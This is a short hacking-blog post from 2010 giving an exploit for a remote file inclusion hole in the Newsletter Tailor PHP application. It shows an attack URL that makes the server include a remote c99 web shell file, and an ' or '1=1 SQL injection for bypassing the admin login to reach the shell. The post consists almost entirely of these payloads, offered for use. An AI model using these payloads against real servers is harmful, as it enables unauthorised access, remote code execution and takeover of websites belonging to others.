Newsletter Tailor Remote File Include Vulnerability
February 10, 2010, 3:37 pm
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
===[ Exploit ]=== include($p.".php");
|
[»] http://server/list/admin/index.php?p=http://localhost/c99.txt? |
[»]Note: When you update the page prompts you to log on |
[»](Auth Bypass) SQL Injection :user:' or '1=1 pass:' or '1=1 |
Then be accessed on the "sh3ll" |
|
Comments Off
